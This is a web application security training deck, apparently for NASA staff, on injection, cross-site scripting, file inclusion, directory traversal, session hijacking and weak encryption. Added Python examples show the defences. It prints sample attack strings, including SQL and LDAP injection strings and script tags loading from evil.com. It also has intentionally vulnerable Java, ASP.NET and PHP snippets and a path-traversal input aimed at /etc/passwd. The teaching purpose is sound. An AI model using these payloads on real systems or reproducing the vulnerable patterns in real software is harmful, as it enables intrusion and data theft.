Application and Website Security -- Fundamental Edition
Daniel Owens, IT Security Professional
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Purpose
Drum up interest
Session Prerequisites
None
Communication Media and Security Concerns
Communication media:
'Wired' networks
'Wireless' networks
Security concerns:
The Insider
The Outsider
The Technology
Nature
A Note About Security
Security helps functionality – if it doesn’t help functionality, it isn’t security.
-Daniel Owens
Consequences of Poor Security
Stolen intellectual property
System downtime
Lost productivity
Damage to NASA's reputation
Lost public confidence
Lost revenue
Congressional inquiries
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
SQL | LDAP Injection
SQL and LDAP Injection
The injection of malicious code intended to bypass filtering and execute a query of the attacker's choosing
Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists
Example strings include:
1'1
%31%27%20%4F%52%20%27%31%27%3D%27%31
1' OR '1'='1
*(|(mail=*))
Java SQL Injection
import java.sql.*;

public class Lookup {
    public static void main(String[] args) throws SQLException {
        Connection conn = null;
        String username = args[0];
        String password = args[1];
        // Vulnerable: user-controlled text is concatenated straight into the SQL statement
        String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
        conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
        Statement stmnt = conn.createStatement();
        ResultSet rs = stmnt.executeQuery(query);
        // ...
    }
}
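The Java slide shows the vulnerable pattern; the following is an added example (not from the slides) that ports it to Python with an in-memory SQLite table so the three defences the earlier slide lists (parameterized statements, whitelists, escaping) can be compared side by side. The table contents, the username rule and the LDAP escaping table are constructed for the demonstration; the LDAP escaping follows RFC 4515.

```python
import re
import sqlite3

# Constructed sample data (not from the slides) so the block runs offline.
def build_sample_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "LetMeIn")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Same shape as the Java slide: the user-controlled string is spliced into the SQL text,
    # so the input can change the grammar of the statement, not just a value in it.
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    # The statement is fixed before any input is seen; the value travels as a bound parameter
    # and is only ever compared, never parsed as SQL.
    return conn.execute("SELECT uid, pass FROM users WHERE uid LIKE ?",
                        (username + "%",)).fetchall()

# Assumed application rule: usernames are short, lowercase identifiers.
USERNAME_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")

def is_valid_username(username: str) -> bool:
    # Whitelist check: describe what is allowed, reject everything else.
    return USERNAME_RE.fullmatch(username) is not None

def lookup_whitelisted(conn: sqlite3.Connection, username: str) -> list:
    # Validation and parameterization are complementary: validate first, then still bind.
    if not is_valid_username(username):
        raise ValueError("username rejected by whitelist")
    return lookup_parameterized(conn, username)

# RFC 4515 escaping for a value placed inside an LDAP search filter (the slide's
# "*(|(mail=*))" string relies on these characters being interpreted as filter syntax).
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_ldap_filter_value(value: str) -> str:
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)

def ldap_filter_for_mail(mail: str) -> str:
    return "(mail=" + escape_ldap_filter_value(mail) + ")"

if __name__ == "__main__":
    conn = build_sample_db()
    payload = "1' OR '1'='1' --"     # slide string plus a trailing comment to absorb the closing %'
    print("vulnerable:", lookup_vulnerable(conn, payload))      # every row
    print("parameterized:", lookup_parameterized(conn, payload))  # no rows
    print("ldap:", ldap_filter_for_mail("*(|(mail=*))"))
```

Running the block shows the concatenated query returning the whole table for the injected string while the parameterized query returns nothing, because SQLite treats the bound text as a literal pattern. The whitelist rejects the string before a query is even built; for LDAP, escaping the filter metacharacters turns the wildcard-and-OR payload into a literal mailbox name.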
Demonstration 1
SQL Injection
Bypassing Security Checks
Case Study 1
SQL Injection
Owning Networks
Cross-Site Scripting (XSS)
XSS
The injection of client-side code
Comes in three kinds:
Persistent
Non-Persistent
DOM
Only occurs when user input influences the output
Can be stopped by assuming all input is malicious until proven otherwise through a whitelist
Can lead to a complete system compromise – for the client, the website, and the server
Cross-Site Scripting (cont.)
XSS (cont.)
Sample strings:
<script src=http://evil.com/attack.js << </script <<
<link rel="stylesheet" href=http://evil.com/attack.css>
%3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
<img src="" onMouseOver="alert(document.cookie)"; />
ASP.NET Cross-Site Scripting
<%@ Page Language="C#" ValidateRequest="false" %>
<html>
<script runat="server">
void btnSubmit_Click(Object sender, EventArgs e)
{
    // Vulnerable: the text box value is written to the response without encoding
    Response.Write(txtString.Text);
}
</script>
<body>
<form id="form1" runat="server">
<asp:TextBox id="txtString" runat="server"
    Text="<script>alert('hi');</script>" />
<asp:Button id="btnSubmit" runat="server"
    OnClick="btnSubmit_Click"
    Text="Submit" />
</form>
</body>
</html>
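The ASP.NET listing writes the text box straight into the response. The following added example (not part of the slides) reproduces that behaviour in Python beside the two fixes the XSS slide calls for: entity-encoding at output time, for both the HTML text context and a quoted attribute context, and a whitelist that only accepts the input the field is meant to hold. The search-term rule is an assumption made for the example.

```python
import html
import re

def render_vulnerable(user_text: str) -> str:
    # Same behaviour as Response.Write(txtString.Text): the raw input becomes page markup.
    return "<p>You entered: " + user_text + "</p>"

def render_text_encoded(user_text: str) -> str:
    # HTML text context: entity-encode so the browser displays the characters
    # instead of parsing them as tags or script.
    return "<p>You entered: " + html.escape(user_text, quote=True) + "</p>"

def render_attribute_encoded(user_text: str) -> str:
    # Attribute context: always quote the attribute and encode both quote characters,
    # so input such as  " onmouseover="alert(document.cookie)  cannot close the attribute
    # and start a new event handler (compare the slide's onMouseOver sample string).
    return '<input type="text" name="q" value="' + html.escape(user_text, quote=True) + '">'

# Assumed application rule: this field only ever holds a short, plain search term.
SEARCH_TERM_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,40}$")

def is_allowed_search_term(user_text: str) -> bool:
    # Whitelist: input is malicious until it matches what the field is for.
    return SEARCH_TERM_RE.fullmatch(user_text) is not None

def contains_markup(user_text: str) -> bool:
    # Cheap signal for logging or alerting on rejected input; not a substitute for encoding.
    return any(ch in user_text for ch in "<>\"'")

if __name__ == "__main__":
    sample = "<script>alert('hi');</script>"   # the slide's text box default value
    print(render_vulnerable(sample))
    print(render_text_encoded(sample))
    print(render_attribute_encoded('" onmouseover="alert(document.cookie)'))
    print("allowed:", is_allowed_search_term(sample))
```

html.escape covers HTML text and quoted-attribute contexts only; a value placed inside a script block, a URL or a CSS property needs the encoder for that context, which is why the whitelist belongs in front of the encoder rather than replacing it.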
Demonstration 2
XSS
Having Fun
Remote File Include/Execution | Code Injection
Remote File Include and Execution
An attacker tricks the system into including and/or executing arbitrary files
Code Injection
Attacker tricks the system into executing arbitrary code by injecting the commands into the code
Both
Code of the attacker's choosing is executed
Contrary to popular belief, ANY language can suffer this
PHP Remote File Include
<?php
// ...
// Vulnerable: the files to include come straight from the query string
require_once($_GET['config']);
require_once($_GET['base'] . "/index.php");
// ...
?>
ASP.NET Remote File Include
<%
' ...
' Vulnerable: the URL to fetch comes straight from the query string
url = Request.QueryString
Set xml = Server.CreateObject("Microsoft.XMLHTTP")
xml.open "GET", url, False
xml.send ""
Response.Write xml.responseText
Set xml = Nothing
' ...
%>
Hidden Elements | Cookies
Hidden Elements and Cookies
Hidden fields and cookies were merely intended to provide data storage without cluttering up the user's view
They do not provide secure storage
They are not immutable storage locations
Neither should contain sensitive information
Both should be considered malicious until proven otherwise
Any data in them should not be used directly for output
Whitelisting should be used to prove innocence
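Hidden fields and cookies can be rewritten by whoever holds them, so the server has to be able to tell whether a value came back unchanged. The following added example (not from the slides) shows one way to do that: the server attaches an HMAC-SHA256 tag to the value before sending it and verifies the tag on return, so a client that edits the body is detected. The secret key and the order payload are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json

# Assumption: a server-side secret the browser never sees (constructed demo value).
SECRET_KEY = b"constructed-demo-key-rotate-in-production"

def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode("ascii")

def sign_field(payload: dict, key: bytes = SECRET_KEY) -> str:
    """Serialise the payload and append an HMAC-SHA256 tag: <base64 body>.<base64 tag>."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return _b64(body) + "." + _b64(tag)

def verify_field(token: str, key: bytes = SECRET_KEY):
    """Return the payload if the tag is valid, else None; trust the value only after this check."""
    try:
        body_b64, tag_b64 = token.split(".", 1)
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:            # malformed token (binascii.Error is a ValueError)
        return None
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return json.loads(body)

def rewrite_body(token: str, new_payload: dict) -> str:
    """What any client can do to a hidden field: replace the body and keep the old tag."""
    body = json.dumps(new_payload, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return _b64(body) + "." + token.split(".", 1)[1]

if __name__ == "__main__":
    token = sign_field({"item": "widget", "price_cents": 1999})
    print("round trip:", verify_field(token))
    print("edited body:", verify_field(rewrite_body(token, {"item": "widget", "price_cents": 1})))
```

The tag gives integrity, not confidentiality: the body is plain base64 and anyone holding the field can read it, which is why the slide's rule that neither hidden fields nor cookies should carry sensitive data still applies. The tag also does not stop a client replaying an old, validly signed value; binding the payload to the session or adding an expiry covers that.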
Hidden Elements | Cookies (cont.)
Hidden Elements and Cookies (cont.)
[Slide image: dump of hidden-field data from a NASA CMTOOLS login page; legible fragments include ReferrerUrl https://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspx, an OnClick handler "return confirm(... 'USERNAME (RandomData)'); return false;", a call SetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', 'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return;, and the control name ctl00$SimpleSearchForm$User1$UserListGridView]
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Session Hijacking – Cookie Theft
Cookie Theft
The theft of a client's cookies by an attacker
Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc.
Can be hampered if mechanisms such as NONCEs are used
NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information
Additional mechanisms include using secure cookies, but this has limited impact
Session Hijacking – Session Fixation
Session Fixation
An attacker uses a 'known' session ID
Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session
This is often a phishing or other social engineering attack
Can be hampered if session IDs are 'rekeyed' on login AND sessions expire and are removed quickly
Difficult to stop if sessions are guessable
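The two session hijacking slides above prescribe three controls: bind the session to characteristics of the client (the slide's NONCE), rekey the session ID at login, and expire idle sessions quickly. The following added example (not from the slides) implements all three in a small in-memory session store. The fingerprint inputs are the ones the cookie theft slide lists; the 15-minute timeout and the client addresses are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

SESSION_TTL_SECONDS = 900   # assumption: 15-minute idle timeout

def fingerprint(client_ip: str, server_ip: str, server_port: int, user_agent: str) -> str:
    # Hash of the per-client characteristics from the slide. It is stored server-side
    # with the session and recomputed on every request; it is never sent to the client.
    material = "|".join([client_ip, server_ip, str(server_port), user_agent]).encode("utf-8")
    return hashlib.sha256(material).hexdigest()

class SessionStore:
    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be exercised deterministically
        self._sessions = {}      # session id -> {"user", "fp", "last_seen"}

    def create(self, fp: str) -> str:
        sid = secrets.token_urlsafe(32)   # 256 random bits: the id is not guessable
        self._sessions[sid] = {"user": None, "fp": fp, "last_seen": self._now()}
        return sid

    def lookup(self, sid: str, fp: str):
        """Return the session record for this id and client, or None (and revoke) if it no longer qualifies."""
        record = self._sessions.get(sid)
        if record is None:
            return None
        if self._now() - record["last_seen"] > SESSION_TTL_SECONDS:
            del self._sessions[sid]          # expired: remove it rather than leave it lying around
            return None
        if not hmac.compare_digest(record["fp"], fp):
            del self._sessions[sid]          # presented from a different client: treat as theft, fail closed
            return None
        record["last_seen"] = self._now()
        return record

    def login(self, sid: str, fp: str, user: str):
        """Authenticate the user on a fresh session id; the pre-login id is discarded."""
        record = self.lookup(sid, fp)
        if record is None:
            return None
        del self._sessions[sid]              # rekey: an id an attacker may already know becomes useless
        new_sid = self.create(fp)
        self._sessions[new_sid]["user"] = user
        return new_sid

if __name__ == "__main__":
    store = SessionStore()
    fp = fingerprint("10.0.0.5", "10.0.0.1", 443, "Mozilla/5.0")   # constructed client
    anonymous = store.create(fp)
    authenticated = store.login(anonymous, fp, "alice")
    print("rekeyed:", anonymous != authenticated)
    print("old id still valid:", store.lookup(anonymous, fp) is not None)
```

Binding to the client IP has a cost the slide does not mention: users behind rotating proxy pools or on mobile networks change address mid-session and are logged out, so a deployment may prefer to bind on the server-side and user-agent fields and treat an IP change as a signal to log rather than revoke.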
Demonstration 3
Session Hijacking
Session Fixation
Directory Traversal
Directory Traversal
An attacker is able to trick the system into traversing the directory structure
In many instances, arbitrary files can be viewed
Attackers are often attempting to execute a file or gather information
If user input dictates the output, care must be taken to ensure the input is 'valid'
Whitelists become invaluable
In extreme cases, an attacker can actually use this to gain administrator access to the server
PHP Directory Traversal
<?php
// ...
// Vulnerable: $date is used unvalidated to build a file path
$date = $_GET['date'];
if ($handle = fopen("calendar/$date", "rb")) {
    print(fread($handle, filesize("calendar/$date")));
    fclose($handle);
}
// ...
?>
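The PHP directory traversal listing and the earlier PHP remote file include listing share one root cause: a request parameter is used as a path (or URL) without the server deciding what it may refer to. The following added example (not from the slides) shows the whitelist approach both slides recommend in Python: the calendar name must match a strict pattern and the resulting path must still lie under the calendar directory, and an include is selected by key from a fixed table rather than by a caller-supplied path. The base directory, the date format and the include table are assumptions made for the example.

```python
import posixpath
import re

CALENDAR_BASE = "/var/www/app/calendar"           # assumption: where calendar files live
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")     # assumption: calendar files are named YYYY-MM-DD

def is_valid_date_name(name: str) -> bool:
    # Whitelist: only a bare date, so separators, "..", NUL bytes and URLs never match.
    return DATE_RE.fullmatch(name) is not None

def is_within_base(base: str, requested: str) -> bool:
    # Defence in depth behind the whitelist: normalise the joined path (collapses "..", "//")
    # and require it to stay under base. An absolute "requested" discards base in join()
    # and therefore fails this check.
    base = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base, requested))
    return target == base or target.startswith(base + "/")

def resolve_calendar_path(requested: str, base: str = CALENDAR_BASE):
    """Return the file path to open for this request, or None if the request is rejected."""
    if not is_valid_date_name(requested):
        return None
    if not is_within_base(base, requested):
        return None
    return posixpath.join(base, requested)

# Fix for the remote file include pattern: the request chooses a key, never a path or URL.
ALLOWED_INCLUDES = {                               # assumption: the application's include table
    "default": "/var/www/app/config/default.php",
    "reports": "/var/www/app/config/reports.php",
}

def resolve_include(name: str):
    return ALLOWED_INCLUDES.get(name)

if __name__ == "__main__":
    for candidate in ["2010-03-01", "../../../../etc/passwd", "2010-03-01\x00.php"]:
        print(repr(candidate), "->", resolve_calendar_path(candidate))
    print("include:", resolve_include("http://evil.com/attack.txt"))
```

posixpath.normpath is purely lexical: it does not follow symbolic links. If the calendar directory may contain symlinks, resolve the final path with os.path.realpath and repeat the containment check on the resolved path before opening the file.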
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Session Hijacking – Spoofing
Spoofing
Pretending to be someone else, an attacker attempts to gain the victim's privileges
Comes in three basic forms
Blind (write-only)
Half pipe (read-only)
Full pipe
Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
Demonstration 4
Session Hijacking
Spoofing
Case Study 2
Session Hijacking
Spoofing
Weak Encryption | Using Encoding
Weak/Home-Grown Encryption
The use of weak and home-grown encryption has led to the compromise of many systems
It is also what makes session hijacking via spoofing, and man-in-the-middle (bucket brigade) and substitution attacks, so trivial
Encoding
Algorithms that take data and merely change its representation (normally the number of bits used per character), with no key involved
This is not secure by any means
Case Study 3
Weak Encryption | Encoding
XORSHA
Base64
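The case study names XOR and Base64, which are the two most common things mistaken for encryption. The following added example (not from the slides) makes the slide's point concrete: Base64 is reversed with no key at all, and repeating-key XOR gives up its key as soon as any stretch of plaintext is known, such as a fixed record header. The plaintext, key and header are constructed for the demonstration.

```python
import base64

def base64_encode(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")

def base64_decode(text: str) -> bytes:
    # Encoding, not encryption: anyone can reverse it because there is no secret involved.
    return base64.b64decode(text)

def xor_with_key(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR, the typical "home-grown encryption". Applying it twice restores the input.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_xor_key(ciphertext: bytes, known_plaintext_prefix: bytes, key_len: int) -> bytes:
    # Because c = p XOR k, k = c XOR p wherever p is known; key_len bytes of known
    # plaintext (a fixed header is usually enough) reveal the whole repeating key.
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext_prefix[:key_len]))

def looks_like_base64_credentials(value: str) -> bool:
    # Detection helper for reviews: a Base64 token that decodes to "user:password" text.
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return ":" in decoded and decoded.isprintable()

if __name__ == "__main__":
    token = base64_encode(b"admin:LetMeIn")         # constructed credential, as seen in a cookie or header
    print(token, "->", base64_decode(token))
    key = b"k3y"                                     # constructed short key
    ct = xor_with_key(b"uid=admin;role=user", key)   # constructed record with a fixed "uid=" header
    print("recovered key:", recover_xor_key(ct, b"uid=", len(key)))
```

The practical reading for a code review: if a value can be decoded without a key it is encoding, and if the "cipher" is XOR with a fixed key then any predictable field in the data (a header, a field name, a timestamp format) serves as the known plaintext. Data that needs confidentiality belongs under a vetted authenticated cipher with proper key management, not under either of these.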
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion and Appendices
Security Compass
XSS-Me
A free Firefox plug-in
Performs semi-automated XSS attacks against POST fields
SQL Inject-Me
A free Firefox plug-in
Performs semi-automated SQL injection attacks against POST fields
Access-Me
A free Firefox plug-in…
Other Firefox Add-ons
Web Developer Add-on
Free
Lets you view source files cleanly and easily
Lets you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)
Lets you view and modify form fields and cookie data
Tamper Data
Free
Lets you modify most request data
Fuzzers
BED.pl
Free Perl script
Performs basic tests of your SERVER
JBroFuzz
Free Java application
Lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion
Powerfuzzer
Free and commercial versions (Python script)
Easy and multi-talented… automated
Other Tools
Sothink SWF Decompiler
Decompiles any Adobe Flash or Flux script
Cavaj
Free
Decompiles any Java program
Nikto
Free
Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
For More Information
Microsoft Security Site (all audiences)
http://www.microsoft.com/security
MSDN Security Site (developers)
http://msdn.microsoft.com/security
TechNet Security Site (IT professionals)
http://www.microsoft.com/technet/security
SANS Top-20 (IT Professionals)
http://www.sans.org/top20/
For More Information (cont.)
Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers)
http://cwe.mitre.org/top25/index.html
GRC IT Security Office
http://itsecurity.grc.nasa.gov
Most Common Software Errors
http://discussweb.com/software-testing/803-most-common-software-errors.html
Acknowledgements
I stole the background from Microsoft
I stole a lot from my experiences and previous writings